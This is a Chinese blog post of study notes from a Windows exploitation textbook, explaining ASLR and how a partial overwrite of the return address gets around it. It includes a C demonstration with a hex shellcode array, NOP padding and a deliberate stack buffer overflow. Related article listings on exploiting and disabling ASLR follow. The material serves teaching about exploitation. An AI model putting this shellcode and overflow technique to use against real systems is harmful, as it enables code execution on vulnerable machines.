漏洞利用原理(高级)

最新推荐文章于 2023-12-09 10:55:53 发布
最新推荐文章于 2023-12-09 10:55:53 发布
阅读量1.1k 收藏
点赞数
分类专栏: 0day安全:软件漏洞分析技术
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wk19951125/article/details/100100496
版权

ASLR

内存随机化保护机制的原理

ASLR就是通过加载程序时不适用固定的基址加载,从而干扰shellcode定位。

支持ASLR的程序在其PE头会设置IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE标识。
VS2005 SP1 加入/dynamicbase链接来完成

ASLR主要分为了3个部分:

  • 映像随机化
  • 堆栈随机化
  • PEB和TEB随机化

映像随机化

在PE文件映射到内存时,对其加载的虚拟地址进行随机化处理,该地址是在系统启动时确定,重启后地址会发生变化。
映像随机化开关:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\MoveImages

  • 0:禁用
  • -1:强制对可随机化的映像进行处理,无论是否设置IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE
  • 设置为其他值时为正常工作模式,只对具有随机化处理标识的映像进行处理

堆栈随机化

在程序运行时随机的选择堆栈的基址。

PEB(进程环境块)和TEB(线程环境块)随机化

微软在XP SP2之后不再使用固定的PEB基址0x7FFDF000和TEB基址0x7FFDE000,但是TEB存放在FS:0FS:[0x18]处,PEB存放在TEB偏移0x30处。

利用部分覆盖进行定位内存地址

映像随机化只对映像加载基址的前两个字节做随机化处理

示例代码:

#include "stdafx.h"
#include "stdlib.h"

char shellcode[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x42\x12"
;
char * test()
{
	char tt[256];
	memcpy(tt,shellcode,262);
	return tt;	
}
int _tmain(int argc, _TCHAR* argv[])
{
	char temp[200];
	test();
	return 0;
}

首先计算覆盖到返回地址需要260个字节,因此用261~262来覆盖返回地址的后两位,
在这里插入图片描述
在这里插入图片描述

参考文献

《0day安全:软件漏洞分析技术》

你的名字5686
关注
专栏目录
《0day安全》——在内存中躲猫猫: ASLR
sunr_的博客
08-31 298
原理 前面所有漏洞利用方法都有着一个共同的特征:都需要确定一个明确的跳转地址。无论是 JMP E SP 等通用跳板指令还是 Ret2Libc 使用的各指令,我们都要先确定这条指令的入口点。 微软的 ASLR( Address Space Layout Randomization)技术就是通过加载程序的时候不再使用固定的基址加载,从而干扰shellcode 定位的一种保护机制。 支持 ASLR 的程序在它的 PE 头中会设置 IMAGE_DLL_CHARACTERISTICS_ DYNAMIC_BASE 标识
java中asl_带你认识绕不开的ASLR
weixin_33744799的博客
02-27 492
微软从windows vista/windows server 2008(kernel version 6.0)开始采用ASLR技术,主要目的是为了防止缓冲区溢出ASLR技术会使PE文件每次加载到内存的起始地址随机变化,并且进程的栈和堆的起始地址也会随机改变。ASLR(Address space layout randomization)是一种针对缓冲区溢出的安全保护技术,通过对堆、栈、共享库映射...
cygwin问题
Lemonade_s的博客
12-09 593
4.将强制映像随机化强制性ASLR)选择默认关闭即可。1.点击Windows安全中心。2.点击应用和浏览器控制。3.点击攻击防护设置。
CentOS 7 设置Squid代理服务器
苍木念川的博客
12-31 496
本文为作者学习文章,按作者习惯写成,如有错误或需要追加内容请留言(不喜勿喷) 本文为追加文章,后期慢慢追加 Linux环境:CentOS 7 1.安装squid和常用工具 # 安装squid yum -y install sqiud # 安装openssl yum -y install openssl 2、修改配置文件,/etc/squid/squid.conf # 修改配置文件 vim /etc/squid/squid.conf #显示如下 ...
Windows安全机制---地址随机化:ASLR机制
每昔的博客
10-13 9900
文章目录Windows安全机制地址随机化:ASLR机制原理映像随机化堆栈随机化PEB与TEB随机化绕过攻击未启用ASLR的模块利用部分覆盖进行定位内存地址利用Heap spray进行内存地址定位利用Java applet heap spray定位内存地址为.net控件禁用ASLR Windows安全机制 微软关于内存保护机制 GS编译技术 SEH的安全校验机制 Heap Cookie,Safe ...
APT漏洞利用利器工具
最新发布
06-27
标题中的“APT漏洞利用利器...总之,“APT漏洞利用利器工具”是一个强大的攻击工具,它集成了多种攻击技术和策略,对于网络安全专业人士来说,了解其工作原理和使用方式,既有助于提升攻击能力,也有助于提高防御水平。
APT高级漏洞利用技术
09-22
### APT高级漏洞利用技术详解 #### 一、引言 在网络安全领域,APT(Advanced Persistent Threat)是指一种复杂的威胁模型,通常涉及高度组织化的团体,他们利用多种技术和手段进行长期渗透并窃取敏感信息。APT攻击...
漏洞利用原理(初级)
wk19951125的博客
08-14 922
形形色色的内存攻击技术狙击Windows异常处理机制S.E.H概述 狙击Windows异常处理机制 S.E.H概述 S.E.H为异常处理结构体,包含两个DWORD指针:S.E.H链表指针和异常处理函数句柄。 相关要点: S.E.H结构体存放在系统栈中; ...
Windows漏洞利用开发系列教程第一部分:漏洞利用介绍
01-11
以上就是“Windows漏洞利用开发系列教程第一部分:漏洞利用介绍”中的主要内容,涉及了漏洞利用的基本概念、所需工具、漏洞类型及其原理漏洞利用的执行过程以及一些高级技术。这部分内容对于刚入门的漏洞研究者来...
ASLR_disabler:在预编译的EXE上禁用IMAGE_OPTIONAL_HEADER中的ASLR标志IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE。 适用于32位和64位Windows EXEPE映像
05-28
ASLR_disabler 在预编译的EXE上禁用IMAGE_OPTIONAL_HEADER中的ASLR标志IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE。 适用于32位和64位Windows EXE / PE映像 该软件通过强制固定映像库来对EXE进行黑客攻击,以使ASLR受到重大安全破坏,从而禁用ASLR,因此,软件工程师可以使用该软件来开发例如功能劫持。 这是PE的一部分:IMAGE_OPTIONAL_HEADER中的WORD DllCharacteristics,标志:IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE(0x0040)记下有关ImageBase(第52和60行)的信息,如果设置为与启动器/同一应用程序中的任何其他应用程序冲突,调试器将修改ImageBase。集会
DEP和ASLR的原理与破解
wangjiabin2007的专栏
07-10 6201
DEP原理就是在系统的内存页中设置了一个标志位,标示这个内存页的属性(可执行),硬件和系统级支持。 ASLR 原理同一个程序运行时,其相同模块的加载地址是随机的,不是固定在某个地址上。 DEP的绕过(破解)方法。
对抗栈帧地址随机化/ASLR的两种思路和一些技巧
a_18067的博客
11-04 840
栈帧地址随机化是地址空间布局随机化(Address space layout randomization,ASLR)的一种,它实现了栈帧起始地址一定程度上的随机化,令攻击者难以猜测需要攻击位置的地址。 第一次遇到这个问题是在做cs:app3e/深入理解操作系统attacklab实验的时候,后来在做学校的一个实验的时候也碰到了这个问题,最近在看一篇“上古黑客”写的文章的时候又碰到了这个...
aslr_什么是ASLR,它如何确保计算机安全?
culinxia2707的博客
09-04 3853
aslrAddress Space Layout Randomization (ASLR) is a security technique used inoperating systems, first implemented in 2001. The current versions of all major operating systems (iOS, Android, Windows, ...
LLVM LLD PE 格式分析 (COFF)
zhangxiang0503的博客
09-17 606
LLVM LLD PE 格式分析(COFF)
缓冲区溢出的保护机制
tomyyyyy
09-15 1434
目录缓冲区溢出的保护机制缓冲区溢出原理CANNARY(栈保护)FORTIFYNX(DEP)PIE(ASLR)RELRO检测工具checksec缓冲区溢出的保护机制 缓冲区溢出原理 缓冲区是内存中存放数据的地方。在程序试图将数据放到机器内存中的某一个位置的时候,因为没有足够的空间就会发生缓冲区溢出。而人为的溢出则是有一定企图的,攻击者写一个超过缓冲区长度的字符串,植入到缓冲区,然后再向一个有限空间...
Windows 10下程序启动时Android studio出现0xc000007b错误的解决方案
wangrui70的博客
12-23 871
Windows 10下程序启动时Android studio出现0xc000007b错误的解决方案背景介绍查找解决方案过程解决办法 背景介绍 本人电脑是Windows 10,是从Windows 7免费升级的版本,之前安装了Android Studio ,打算自学Android 开发,断断续续一直用得好好的。后来在电脑上安装了Outlook 2019 之后,有段时间没有使用Android Studi...
linux溢出总结+windows aslr地址随机化绕过
sunno_ya
05-06 5430
实验一 Linux下缓冲区溢出 通过缓冲区溢出漏洞执行自己的代码 【实验代码】 【实验目的】 通过缓冲区溢出,使其执行not_called函数。 【实验原理及结果】 (1)编译程序(关闭掉栈保护): (2)gdb调试程序 查看vulnerable_function函数汇编代码 我们可以看到该函数开辟了一个0x6c大小的缓冲区 | argument
SolidWorks频繁闪退,可能是(百度)输入法引起的
热门推荐
磁悬浮青蛙呱呱呱
12-03 2万+
我电脑的操作系统是Win 10 1803(17134.167),硬件:i7-6700HQ,16GB DDR4内存,Intel HD 530+GTX 970M. 在自己电脑上装过SolidWorks 2017和2018,这两者闪退的频率都惊人的高。快的话,启动后几十秒就闪退了,慢的话也撑不过2小时,2小时内必有一次闪退。有时候是毫无征兆地闪退,有时则会先出现“您的桌面应用程序资源严重...
APT高级漏洞利用与防护技术解析
最后,袁哥提到了DVE(数据虚拟执行技术)这一高级漏洞利用技术,这是一种基于97年发表的两篇关于利用解释型语言原理的技术,它允许攻击者在不直接执行代码的情况下,利用解释器来运行恶意代码,从而规避某些防护...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值